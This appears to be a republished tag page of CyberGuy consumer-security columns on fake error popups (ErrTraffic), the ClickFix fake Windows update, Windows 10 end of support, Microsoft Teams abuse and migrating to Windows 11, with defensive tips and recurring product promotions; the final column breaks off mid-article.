ReportWire

Tag: windows os

  • Fake error popups are spreading malware fast

    [ad_1]

    NEWYou can now listen to Fox News articles!

    A dangerous cybercrime tool has surfaced in underground forums, making it far easier for attackers to spread malware. 

    Instead of relying on hidden downloads, this tool pushes fake error messages that pressure you into fixing problems that never existed. Security researchers say this method is spreading quickly because it feels legitimate. The page looks broken. The warning feels urgent. The fix sounds simple. 

    That combination is proving alarmingly effective for cybercriminals.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

    How fake error malware attacks actually work

    These attacks begin with a compromised website. When a visitor lands on the page, something looks wrong right away. Text appears broken. Fonts look scrambled. Visual elements seem corrupted. A pop-up then appears claiming the issue can be fixed with a browser update or a missing system font. A button offers to repair the problem instantly. 

    Clicking that button copies a command to the clipboard and displays instructions to paste it into PowerShell or a system terminal. That single step launches the infection.

    MALICIOUS CHROME EXTENSIONS CAUGHT STEALING SENSITIVE DATA

    Fake error popups make a website look broken by scrambling text or fonts to create urgency and panic. (Jens Büttner/picture alliance via Getty Images)

    Why this new tool changes the threat landscape

    The tool behind these attacks is called ErrTraffic. It automates the entire process and removes the technical barriers that once limited cybercrime operations. For about $800, attackers get a full package with a control panel and scripted payload delivery. Analysts at the Hudson Rock Threat Intelligence Team identified the tool after tracking its promotion on Russian-language forums in early December 2025. 

    ErrTraffic works through a simple JavaScript injection. A single line of code connects a hacked site to the attacker’s dashboard. From there, everything adapts automatically. The script detects the operating system and browser. It then displays a customized fake error message in the correct language. The attack works across Windows, Android, macOS and Linux.

    MOST PARKED DOMAINS NOW PUSH SCAMS AND MALWARE

    Teen using their laptop.

    The popups often claim a browser update or missing system font is needed to fix the problem. (Daniel Acker/Bloomberg via Getty Images)

    Why security software struggles to stop it

    Traditional malware defenses look for suspicious downloads or unauthorized installations. ErrTraffic avoids both. Browsers see normal text copying. Security tools see a legitimate system utility being opened manually. Nothing appears out of place. That design allows the attack to slip through protections that would normally stop malware in its tracks.

    The success rate is deeply concerning

    Data pulled from active ErrTraffic campaigns shows conversion rates approaching 60%. That means more than half of the visitors who see the fake error message follow the instructions and install malware. Once active, the tool can deliver infostealers like Lumma or Vidar on Windows devices. Android targets often receive banking trojans instead. The control panel even includes geographic filtering, with built-in blocks for Russia and neighboring regions to avoid drawing attention from local authorities.

    What happens after infection?

    Once malware is installed, credentials and session data are stolen. Those compromised logins are then used to breach additional websites. Each newly hacked site becomes another delivery vehicle for the same attack. That cycle allows the campaign to grow without direct involvement from the original operator.

    FAKE WINDOWS UPDATE PUSHES MALWARE IN NEW CLICKFIX ATTACK

    Man looks distressed while at his computer

    Following the on-screen instructions can quietly trigger malware that steals passwords and personal data. (Kurt Knutsson)

    Ways to stay safe from fake error malware

    A few smart habits can significantly reduce risk when facing fake error pop-ups and browser-based traps.

    1) Never run commands suggested by a website

    Legitimate websites never ask you to copy and paste commands into PowerShell or a system terminal. Fake error malware relies on convincing messages that pressure you into doing exactly that. If a page instructs you to run code to fix a problem, close it immediately.

    2) Close pages that claim your system is corrupted

    Fake error campaigns often use broken text, scrambled fonts or warnings about missing files to grab attention. As a result, these visuals create urgency and trigger fear. In reality, a real system problem never announces itself through a random website, so close the page right away.

    3) Install updates only through official system settings

    Real browser and operating system updates come from built-in update tools, not pop-ups on websites. If an update is needed, your device will notify you directly through system settings or trusted app stores.

    4) Install strong antivirus software on every device

    Strong antivirus software can help block malicious scripts, detect infostealers and stop suspicious behavior before damage spreads. This is especially important since fake error malware targets Windows, Android, macOS and Linux systems.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    5) Use a data removal service to reduce exposure

    Stolen credentials fuel the spread of fake error malware. Removing personal information from data broker sites can reduce the impact if login details are compromised and limit how far an attack can spread.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    Get a free scan to find out if your personal information is already out on the web: Cyberguy.com.

    6) Treat font and browser update pop-ups with suspicion

    Claims about missing fonts or outdated browsers are a hallmark of these attacks. Modern systems manage fonts automatically, and browsers update themselves. A webpage has no reason to request manual fixes.

    If a real update is needed, the operating system will request it directly. A random webpage never should.

    Kurt’s key takeaways 

    Fake error malware works because it plays on a very human reaction. When something on a screen suddenly looks broken, most people want to fix it fast and move on. That split-second decision is exactly what attackers are counting on. Tools like ErrTraffic show how polished these scams have become. The messages look professional. The instructions feel routine. Nothing about the moment screams danger. But behind the scenes, one click can quietly hand over passwords, banking access and personal data. The good news is that slowing down makes a real difference. Closing a suspicious page and trusting built-in system updates can stop these attacks cold. When it comes to pop-ups claiming your device is broken, walking away is often the smartest fix.

    Have you ever seen a pop-up or error message that made you stop and wonder if it was real? Tell us what it looked like and how you handled it by writing to us at Cyberguy.com.

    CLICK HERE TO DOWNLOAD THE FOX NEWS APP

    Sign up for my FREE CyberGuy Report 
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter. 

    Copyright 2025 CyberGuy.com. All rights reserved.

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link

  • Fake Windows update pushes malware in new ClickFix attack

    [ad_1]

    NEWYou can now listen to Fox News articles!

    Cybercriminals keep getting better at blending into the software you use every day. 

    Over the past few years, we’ve seen phishing pages that copy banking portals, fake browser alerts that claim your device is infected and “human verification” screens that push you to run commands you should never touch. The latest twist comes from the ongoing ClickFix campaign.

    Instead of asking you to prove you are human, attackers now disguise themselves as a Windows update. It looks convincing enough that you might follow the instructions without thinking, which is exactly what they want.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM newsletter.

    NEW SCAM SENDS FAKE MICROSOFT 365 LOGIN PAGES

    The malware hides inside seemingly normal image files, using steganography to slip past traditional security tools.  (Microsoft)

    How the fake update works

    Researchers noticed that ClickFix has upgraded its old trick. The campaign used to rely on human verification pages, but now you get a full-screen Windows update screen that looks almost identical to the real thing. Joe Security showed how the page displays fake progress bars, familiar update messages and a prompt that tells you to complete a critical security update.

    If you are on Windows, the site tells you to open the Run box, copy something from your clipboard and paste it in. That “something” is a command that silently downloads a malware dropper. The final payload is usually an infostealer, which steals passwords, cookies and other data from your machine.

    NEW EMAIL SCAM USES HIDDEN CHARACTERS TO SLIP PAST FILTERS

    A fake Windows update screen

    Fake update screens are getting harder to spot as attackers mimic Windows with near-perfect precision. (Joe Security)

    The moment you paste the command, the infection chain begins. First, a file called mshta.exe reaches out to a remote server and grabs a script. To avoid detection, these URLs often use hex encoding for parts of the address and rotate their paths. The script then runs obfuscated PowerShell code filled with junk instructions to throw researchers off. Once PowerShell does its work, it decrypts a hidden .NET assembly that functions as the loader.

    Why is this attack so hard to detect?

    The loader hides its next stage inside what looks like a regular PNG file. ClickFix uses custom steganography, which is a technique that hides secret data inside normal-looking content. In this case, the malware sits inside the image’s pixel data. The attackers tweak color values in certain pixels, especially in the red channel, to embed pieces of shellcode. When you view the image, everything appears normal.

    The script knows exactly where the hidden data sits. It extracts the pixel values, decrypts them and rebuilds the malware directly in memory. That means nothing obvious is written to disk. Security tools that rely on file scanning miss it, since the shellcode never appears as a standalone file.

    Once rebuilt, the shellcode is injected into a trusted Windows process like explorer.exe. The attack uses familiar in-memory techniques such as VirtualAllocEx, WriteProcessMemory and CreateRemoteThread. Recent ClickFix activity has delivered infostealers like LummaC2 and updated versions of Rhadamanthys. These tools are built to harvest credentials and send them back to the attacker with very little noise.

    Person wearing a hoodie works on multiple computer screens displaying digital data in a dark room.

    Once the hidden code loads into a trusted Windows process, infostealers quietly begin harvesting your data. (Kurt “CyberGuy” Knutsson)

    7 steps you can take to protect yourself from the ClickFix campaign

    The best way to stay protected is to slow down for a moment and follow a few steps that cut off these attacks before they start.

    1) Never run commands you didn’t ask for

    If any site tells you to paste a command into Run, PowerShell or Terminal, treat it as an immediate warning sign. Real operating system updates never require you to run commands from a webpage. When you run that command, you hand full control to the attacker. If something feels off, close the page and don’t interact further.

    2) Keep Windows updates inside Windows

    Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up pretending to be a Windows update is always fake. If you see anything outside the normal update flow asking for your action, ignore it and check the real Windows Update page yourself.

    3) Use a reputable antivirus

    Choose a security suite that can detect both file-based and in-memory threats. Stealthy attacks like ClickFix avoid leaving obvious files for scanners to pick up. Tools with behavioral detection, sandboxing and script monitoring give you a much better chance of spotting unusual activity early.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    4) Use a password manager

    Password managers create strong, unique passwords for every account you use. They also autofill only on legitimate websites, which helps you catch fake login pages. If a manager refuses to fill out your credentials, take a second look at the URL before entering anything manually.

    Next, see if your email has been exposed in past breaches. Our No. 1 password manager pick includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

    Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.

    5) Use a personal data removal service

    Many attacks start by targeting emails and personal details already exposed online. Data removal services help shrink your digital footprint by requesting takedowns from data broker sites that collect and sell your information. They can’t erase everything, but reducing your exposure means fewer attackers have easy access to your details.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    Get a free scan to find out if your personal information is already out on the web: Cyberguy.com.

    6) Check URLs before trusting anything

    A convincing layout doesn’t mean it is legitimate. Always look at the domain name first. If it doesn’t match the official site or uses odd spelling or extra characters, close it. Attackers rely on the fact that people recognize a page’s design but ignore the address bar.

    7) Close suspicious full-screen pages

    Fake update pages often run in full-screen mode to hide the browser interface and make the page look like part of your computer. If a site suddenly goes full screen without your permission, exit with Esc or Alt+Tab. Once you’re out, scan your system and don’t return to that page.

    Kurt’s key takeaway

    ClickFix works because it leans on user interaction. Nothing happens unless you follow the instructions on the screen. That makes the fake Windows update page especially dangerous, because it taps into something most people trust. If you are used to Windows updates freezing your screen, you may not question a prompt that appears during the process. Cybercriminals know this. They copy trusted interfaces to lower your guard and then rely on you to run the final command. The technical tricks that follow are complex, but the starting point is simple. They need you to help them.

    Do you ever copy commands from a website without thinking twice about what they do? Let us know by writing to us at Cyberguy.com.

    CLICK HERE TO DOWNLOAD THE FOX NEWS APP

    Sign up for my FREE CyberGuy Report 

    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM newsletter. 

    Copyright 2025 CyberGuy.com.  All rights reserved.

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link

  • Windows 10 users face ransomware nightmare as Microsoft support ends in 2025 worldwide

    [ad_1]

    NEWYou can now listen to Fox News articles!

    Microsoft’s blog recently gave a firm warning: unsupported systems aren’t just outdated, they’re unprotected. That message targets anyone still using Windows 10, and it’s serious. In Microsoft’s Digital Defense Report, over 90% of ransomware attacks hit unsupported PCs. That statistic alone should make every Windows 10 user think twice.

    When an operating system stops receiving updates, it becomes an open door for hackers. Security patches dry up, and vulnerabilities grow. So while your computer might seem fine today, it could already be compromised without your knowledge.

    Sign up for my FREE CyberGuy Report

    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM newsletter

    10 WAYS TO SECURE YOUR OLDER MAC FROM THREATS AND MALWARE

    Why are unsupported systems dangerous

    Unsupported Windows 10 systems no longer get the updates that keep you safe. Without those patches, ransomware and malware have easy access to your files. Once inside, attackers can encrypt your personal data or steal credentials and banking details.

    It’s not just about losing files. Identity theft and financial fraud often start with outdated systems. The older the software, the easier it is for cybercriminals to exploit weaknesses that will never be fixed.

    The “just one more year” trap

    Many people tell themselves they’ll upgrade later. Microsoft calls this “just one more year” thinking. The problem is that every delay increases your risk. Extended security updates only offer limited coverage, and they don’t stop new types of attacks.

    Without Microsoft’s regular monitoring, new vulnerabilities stay hidden. You could be using your computer for months while attackers quietly collect your data. That’s a frightening thought, especially when most of it can be prevented by upgrading.

    Upgrading to Windows 11 keeps your system protected with ongoing security updates. (Microsoft)

    MICROSOFT SOUNDS ALARM AS HACKERS TURN TEAMS PLATFORM INTO ‘REAL-WORLD DANGERS’ FOR USERS

    The hidden costs of waiting to upgrade to Windows 11

    It’s easy to think upgrading costs too much. But what about the cost of losing your photos, business files or financial information? Data recovery, fraud resolution and downtime can cost far more than a new device.

    Hackers know users delay updates, and they actively look for outdated systems. Even one unsupported device in a home or office network can create a weak spot that exposes everything else.

    How to stay safe from unsupported Windows 10 security risks

    You can protect yourself right now with a few smart steps. These actions reduce your exposure, tighten your online defenses and prepare you for a smooth upgrade to Windows 11. The good news is that most of these changes only take a few minutes but make a major difference in your security.

    1) Upgrade your system to Windows 11

    HACKERS FOUND A WAY TO TURN OFF WINDOWS DEFENDER REMOTELY

    Start by checking whether your PC can handle Windows 11. Most modern AMD and Intel processors already meet the system requirements. Upgrading keeps your computer protected with ongoing updates that patch vulnerabilities and improve overall performance. It’s one of the simplest ways to defend against ransomware and malware before they strike.

    2) Watch out for phishing scams and install strong antivirus software

    Be cautious with every link and attachment you receive. Cybercriminals love sending fake update notifications that look like official Microsoft messages. These phishing scams often contain malicious links that install malware in seconds. Before you click, hover over links to verify their source and only download updates directly from Microsoft’s official site. To add an extra layer of protection, install strong antivirus software that can detect and block malicious files before they infect your system.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Signage outside the Microsoft Campus

    Delaying your Windows 11 upgrade only gives cybercriminals more time to strike. (Photographer: Chona Kasinger/Bloomberg via Getty Images)

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    3) Use a data removal service

    HOW A SINGLE MACBOOK COMPROMISE SPREAD ACROSS A USER’S APPLE DEVICES

    Use a personal data removal service to take your information off people-search and data broker websites. These services help remove your name, address, phone number and other personal details that scammers often use for phishing or social-engineering attacks. By limiting what’s publicly available about you, you make it much harder for cybercriminals to target you, especially if your older, unsupported Windows 10 system is ever exposed online.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    4) Secure your logins

    Strong logins make a huge difference. Turn on two-factor authentication (2FA) for your most sensitive accounts, such as banking and email. Also, create strong passwords for your accounts and devices, and avoid using the same password for multiple online accounts. Consider using a password manager, which securely stores and generates complex passwords, reducing the risk of password reuse. This extra layer stops hackers, even if they manage to steal a password.

    WINDOWS 10 SUPPORT ENDS: UPGRADE TO WINDOWS 11 SAFELY

    Next, see if your email has been exposed in past breaches. Our #1 password manager (see Cyberguy.com) pick includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords, and secure those accounts with new, unique credentials.

    Man typing on his laptop.

    Without Windows updates, hidden vulnerabilities give hackers easy access to your data. (Felix Zahn/Photothek via Getty Images)

    Check out the best expert-reviewed password managers of 2025 at Cyberguy.com

    5) Back up your data regularly

    Think of backups as your safety net. Save copies of important files to an external hard drive or a trusted cloud service. Schedule automatic backups so you don’t have to remember to do it yourself. If your PC ever gets locked by ransomware, a clean backup means you can restore everything without paying a cent.

    6) Stay informed and proactive

    Cyber threats evolve every day, and knowledge is your best defense. Keep an eye on official Microsoft announcements and alerts. Small changes, like applying updates quickly and revisiting your privacy settings, can keep you a step ahead of attackers.

    CLICK HERE TO DOWNLOAD THE FOX NEWS APP

    Kurt’s key takeaways

    Unsupported systems might look harmless, but they create silent risks that grow over time. Every day you stay on Windows 10 after support ends, you depend on luck instead of protection. Upgrading isn’t just about staying current; it’s about keeping your data safe and your privacy intact.

    Is holding on to Windows 10 worth risking everything stored on your computer? Let us know by writing to us at Cyberguy.com.

    Sign up for my FREE CyberGuy Report

    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM newsletter.

    Copyright 2025 CyberGuy.com. All rights reserved.

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link

  • Microsoft sounds alarm as hackers turn Teams platform into ‘real-world dangers’ for users

    [ad_1]

    NEWYou can now listen to Fox News articles!

    Microsoft is sounding the alarm, and this time, the warning hits home for everyday users. Hackers are now turning Microsoft Teams security threats into real-world dangers that go far beyond corporate networks. Using Teams, cybercriminals gather intel, pose as trusted contacts, trick people into sharing private data and even spread malware that can steal passwords or lock up personal files. 

    What was once a simple video chat and collaboration tool has become a high-value target for cybercriminals and even state-backed hackers. Whether you use Teams for work, school or staying in touch, the risks are real and growing. We’ll break down how attackers abuse Teams, what Microsoft recommends and the simple steps you can take to protect yourself at home or on the job.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM newsletter.

    How hackers use Teams to attack

    Hackers exploit Microsoft Teams at every stage of an attack, using it to spy, impersonate, spread malware and even control compromised systems, and consumers are now in their sights, too.

    SCAMMERS NOW IMPERSONATE COWORKERS, STEAL EMAIL THREADS IN CONVINCING PHISHING ATTACKS

    Hackers are finding new ways to weaponize Microsoft Teams, turning everyday chats into dangerous entry points. (David Becker/Getty Images)

    Reconnaissance via Teams

    Attackers start by probing Teams environments to find weak spots. They look for users with open settings, public profiles or external meeting links. Microsoft warns that “anonymous participants, guests and external access users” can give hackers a way in. If your Privacy Mode is off, they can see when you’re online, send unwanted chats, or try to join meetings outside your group, even if you’re just using a free account.

    Persona building & impersonation

    Hackers often pretend to be someone you trust, like an IT admin, a coworker or even a Microsoft representative. They create fake profiles and logos that look convincing to trick you into clicking a link or sharing credentials. Microsoft says attackers “take advantage of the same resources as legitimate organizations” to pull off their scams.

    Initial access & malware delivery

    Once they’ve earned your trust, hackers send a chat or call that includes a malicious link or file. You might get a message saying, “Your Teams account needs verification” or “Update required for better security.” It’s all bait. These links can install spyware, steal logins or deliver ransomware that locks up your data, whether you’re on a company laptop or your personal PC at home.

    MICROSOFT SHAREPOINT BUG PUTS CRITICAL GOVERNMENT AGENCIES AT RISK

    Persistence & lateral movement

    After breaking in, attackers try to stay hidden. They might add guest accounts, install shortcuts or change permissions so they can come back later. In some cases, they use the same Microsoft tools meant for admins to move across Teams, OneDrive or even your personal files stored in the cloud.

    Command & control & data exfiltration

    Once inside, hackers can send commands through Teams messages or hide malware in shared links. They’ve even been known to send ransom demands directly through Teams chat. Microsoft says one group, Octo Tempest, used Teams to taunt victims and pressure them into paying up, showing how personal these attacks can get.

    Tips to stay protected

    You don’t need to be a cybersecurity expert to stay safe on Microsoft Teams. A few smart tools and habits can go a long way in keeping hackers, scammers and snoops from taking advantage of your information.

    1) Enable privacy mode

    Keep your online presence private. Turn on Privacy Mode in Teams to stop strangers from seeing when you’re active or trying to join meetings. It’s a simple setting that makes it harder for hackers to target you or your company.

    2) Be careful with roles and permissions

    If you share your Teams account with coworkers or family members, don’t give everyone full control. Keep admin access limited to one trusted person. This reduces the chance of someone accidentally approving a scam link or letting malware spread.

    3) Use a data removal service

    Hackers often rely on personal details found online to make their scams more convincing, things like your job title, workplace or even who you’ve video-chatted with. That information helps them build fake Teams profiles or send messages that look legitimate. Using a personal data removal service helps wipe your private details from data broker sites, cutting off one of the main sources hackers use to impersonate you. The less they can learn about you, the harder it is for them to trick you into trusting a fake message or clicking a malicious link.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice. They aren’t cheap, and neither is your privacy. These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites. It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    A man stares at computer code on his monitor in a darkened room, with a ring light reflected on the screen and an open canned beverage next to him.

    There are attack techniques used to compromise people. (Kurt “CyberGuy” Knutsson)

    HOW FAKE MICROSOFT ALERTS TRICK YOU INTO PHISHING SCAMS

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    Get a free scan to find out if your personal information is already out on the web: Cyberguy.com.

    4) Double-check links and files, plus use strong antivirus software

    Hackers love to send fake messages pretending to be support or IT help. Never open links or attachments from people you don’t recognize, even if the message looks official. Use strong antivirus software to automatically scan downloads and attachments before you open them.

    The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

    5) Limit guest access

    Only allow trusted guests into your Teams chats and meetings. If you invited someone for a one-time project, remove them afterward. Tight control over who can join helps prevent impersonators from slipping in unnoticed.

    6) Turn on alerts

    Activate Teams alerts to catch anything unusual, like sign-ins from new devices or unexpected permission changes. Pair that with your antivirus program’s real-time protection to get notified if malicious activity starts on your device.

    7) Think “zero trust”

    Zero Trust means verifying every user, every time. Don’t assume messages or calls are legitimate, especially if someone asks for a password or authentication code. If you’re unsure, contact your company’s IT team or verify the person’s identity through a separate channel.

    GOOGLE CONFIRMS DATA STOLEN IN BREACH BY KNOWN HACKER GROUP

    8) Practice spotting phishing attempts

    Hackers rely on panic and urgency to make you click. If you get a message claiming your account will be locked or that support needs your password, pause. Report suspicious messages to Microsoft or your security provider. Regular phishing awareness training helps you spot scams faster.

    9) Keep everything updated

    Always install the latest Teams and operating system updates. Patches fix security holes that hackers exploit to sneak in.

    Stock image shows nefarious man typing on laptop.

    Cybercriminals often impersonate IT support or trusted colleagues to trick users into sharing credentials. (CyberGuy.com)

    Kurt’s key takeaways

    Microsoft’s warning about Teams is a reminder that hackers are always searching for new ways to reach you, even through apps you use every day. What makes these attacks so dangerous is their familiarity. Messages look normal, video calls seem real, and fake tech support chats can sound convincing. That’s why awareness, not fear, is your strongest defense. With privacy settings enabled, antivirus protection running, and a reliable personal data removal service scrubbing your info from the web, you’re already several steps ahead of scammers. Staying alert to phishing attempts and keeping your software up to date can turn Teams back into what it’s meant to be: a safe, helpful way to stay connected.

    If attackers can weaponize your day-to-day communication platform, how confident are you that your Teams environment is truly safe? Let us know by writing to us at Cyberguy.com.

    CLICK HERE TO GET THE FOX NEWS APP

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM newsletter.

    Copyright 2025 CyberGuy.com.  All rights reserved.  

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link

  • Windows 10 support ends: Upgrade to Windows 11 safely

    [ad_1]

    NEWYou can now listen to Fox News articles!

    With Microsoft ending support for Windows 10 this October, many people are racing to upgrade. Catherine, a longtime HP desktop user, shared her concerns with us: “I need to purchase a new/updated computer with Windows 11 pretty darn quick. I’ve utilized HP desktops for years and would prefer to continue to do so. My concern deals with transferring everything from one computer to another, made more interesting since my husband and I have separate setups and log-ins. I had a My Passport running, but now I believe a lot is in the cloud. We are concerned about losing our emails/contacts, etc. I also use various programs for a couple of groups I’m involved with (Word, PowerPoint, Excel, Adobe Acrobat, etc.), which I cannot afford to lose. Any guidance for a smooth transition would be great.”

    If this sounds familiar, you’re not alone. The good news: you can move everything to a new HP computer running Windows 11 with the right preparation and tools. Here’s a step-by-step guide.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM/NEWSLETTER

    WHAT HAPPENS WHEN WINDOWS 10 SUPPORT ENDS IN 2025?

    Microsoft will end support for Windows 10 this month. (Microsoft)

    What to prepare before you buy a new computer

    Before you switch to a new Windows 11 PC, take these steps to organize your files, programs and accounts, so the move goes as smoothly as possible.

    1) Inventory what you have and make sure it’s backed up.

    • List the programs/software you use (Word, PowerPoint, Excel, Acrobat, etc.), including any license/activation info.
    • Find where your data is: local hard drive, external My Passport drive or cloud (OneDrive, Google Drive, etc.).
    • Make sure you have backups of anything that’s only local.

    2) Check how your email is set up.

    • If it’s a Microsoft/Outlook/Exchange account, a lot may already be stored in the cloud. Outlook contacts/calendars may sync automatically depending on how your accounts are configured.
    • If you use POP (email downloaded locally), or “local only” Outlook data (.pst files), you’ll need to move those manually.

    3) Have your login accounts ready.

    • Know your Microsoft account credentials (if you use one).
    • Know admin passwords for existing software.

    4) Gather license keys/software installers.

    • For paid apps (Adobe Acrobat etc.), make sure you have install files or know how to re-download, plus activation keys.
    • Make a note of any special settings or plugins you use so they get restored.

    Choosing the right computer for your needs 

    When choosing a new HP computer, confirm it runs Windows 11 out of the box. Pick a model with enough storage to hold all your files and plenty of RAM for multitasking. If you rely on external drives, make sure the new computer has the right ports, like USB-C or USB 3.0.

    You can browse CyberGuy’s best laptop picks or best desktop computers for solid options at Cyberguy.com. If you mainly use your computer for email, browsing, or video calls, a tablet, Chromebook, or iPad might be all you need. They’re low-maintenance, secure, and often more affordable than a new Windows laptop.

    WINDOWS 11 FLAW LETS HACKERS BYPASS SECURE BOOT PROTECTIONS

    Windows 11 and Windows 10

    Windows 11 and Windows 10 operating system logos are displayed on laptop screens. Krakow, Poland, on Feb. 3, 2022.  (Beata Zawrzel/NurPhoto)

    Step-by-step: Migrating to the new Windows 11 computer 

    Moving to a new PC takes planning, but following these steps will help you transfer your files, programs and settings safely. This is especially important if you and your spouse use separate logins.

    Back up everything

    Start by backing up your personal files, documents, pictures and desktop to both your external drive and a cloud service like OneDrive. If you use Outlook, export your email, contacts, and calendar if needed.

    • For POP or local .pst files, go to File → Open & Export → Export → Outlook Data File (.pst) and make a copy.
    • For IMAP or Exchange accounts, confirm that everything has synced properly online.

    Back up Windows and settings

    Use Windows Backup or the built-in tools to save your settings and user folders. Apply the latest Windows updates on the old PC before making the switch.

    Set up the new PC

    When you turn on your new computer, sign in with your Microsoft account if you have one. This helps sync certain settings automatically. Reinstall your Office apps, Adobe Acrobat, and any other software using your license keys or installers.

    Transfer data and settings

    If both PCs are connected and supported, you can use Windows Backup’s “Transfer information to a new PC” option. Simply pair them and choose what to move. If that’s not an option, copy backups from your external drive or cloud storage onto the new computer. Restore email by importing your .pst file if required.

    Verify everything works

    Open your key programs to confirm licensing is valid. Check that your email, contacts and calendar are functioning correctly. Go through your files to make sure nothing is missing.

    Set up backup and ongoing sync

    Once you’re up and running, turn on OneDrive or your preferred cloud service to sync important folders like Documents and Desktop. Finally, create a regular backup plan using either your external drive or the cloud, so your new PC stays protected.

    Common problems to avoid

    Some users run out of space on their new PC because they underestimated how much data they had. Others lose email when they forget to export .pst files. License activation can also cause headaches if the software is tied to the old machine, so always deactivate before reinstalling. And remember that older programs may not work perfectly on Windows 11, so check compatibility in advance.

    Tools that can help

    • 3rd party software: Transfers files, settings and some installed apps automatically. For our picks, search “First 10 things to do if you got a new PC” on Cyberguy.com
    • Windows Backup and Transfer: Free but may require reinstalling programs manually.

    External hard drive backup: Still the simplest safety net for keeping copies of your important files. Copy everything important to your external drive as a safety measure before migrating.

